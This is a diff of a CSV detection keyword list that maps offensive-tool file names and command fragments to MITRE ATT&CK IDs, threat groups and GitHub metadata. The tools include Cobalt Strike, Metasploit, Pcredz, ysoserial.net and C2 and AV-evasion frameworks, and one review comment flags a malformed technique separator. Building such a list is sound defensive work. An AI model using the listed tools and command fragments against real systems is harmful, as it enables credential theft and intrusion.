T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*payload_creator.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*payload_creator.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" "*payload_encryption.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" 
-"*payload_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*payload_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*payload_local*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*payload_msf.c*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*payload_msf.exe*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" 
@@ -14585,9 +14751,9 @@
 "*payload_section.hpp*","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","156","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z"
 "*payload_spellshell.c*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z"
 "*payload_spellshell.exe*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z"
-"*payload_tidy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*payload_tidy.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*Payload_Type/freyja/*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z"
-"*PayloadCommsHost*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*PayloadCommsHost*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
 "*--payload-cookie*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z"
 "*Payload-Download-Cradles*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z"
 "*PayloadFormat.ASSEMBLY*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
@@ -14610,20 +14776,20 @@ "*PayloadType.HTTP*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*PayloadType.REVERSE_TCP*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*--payload-url */pwn.html","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","0","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" -"*pcap_linktypes.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*pcap2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*pcapfile.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*pcap_linktypes.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*pcap2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pcapfile.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*PcapXray*","offensive_tool_keyword","PcapXray","Given a Pcap File. plot a network diagram displaying hosts in the network. network traffic. 
highlight important traffic and Tor traffic as well as potential malicious traffic including data involved in the communication.","T1040 - T1071 - T1070 - T1074 - T1075 - T1078 - T1048","TA0001 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Srinivas11789/PcapXray","1","1","N/A","N/A","10","1501","270","2022-03-28T15:31:26Z","2017-10-02T04:47:51Z" "*Pcredz -d *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" "*Pcredz -f *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" "*PCredz -f *.pcap*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Pcredz -i *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. 
etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" -"*PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*PCVAIExhbmd1YWdlPSJDIyIlPgpUaGlzIGlzIHRoZSBhdHRhY2tlcidzIGZpbGUgPGJyLz4KUnVubmluZyBvbiB0aGUgc2VydmVyIGlmIGA8JT0xMzM4LTElPmAgaXMgMTMzNy4*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*PDF_Payload*Doomfist.pdf*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" -"*pdf2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pdf2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*pdfcrack -f *.pdf*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*PDONUT_INSTANCE*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*pe_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*PDONUT_INSTANCE*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*pe_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*pe_packer/dll_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*pe_packer/exe_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*pe_packer/main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" 
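Review bot: The techniques field on the rewritten `*pe_inject.rb*` row still reads `T1204 -T1210`, without the space before the technique ID that every other separator in that column has. A consumer that splits the field on ` - ` would get `T1204 -T1210` back as a single token, so neither ID would map cleanly to ATT&CK when the keyword fires. Since the row is being rewritten for the counter refresh anyway, change the fragment to `T1204 - T1210`. The same string is on the `*peinject.rb*` and `*peinjector.rb*` rows in the next hunk, and on the metasploit row at the top of this view, so it probably comes from one shared metasploit mapping that is best fixed at its source.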
@@ -14631,21 +14797,21 @@ "*pe_packer\exe_main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*pe_packer\main.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*pe_packer_exe.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*pe2sh.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*pe2shc.exe *","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","0","N/A","N/A","10","2007","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" +"*pe2sh.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*pe2shc.exe *","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","0","N/A","N/A","10","2008","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" "*pe2shc.exe*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*pe2shc_*.zip*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
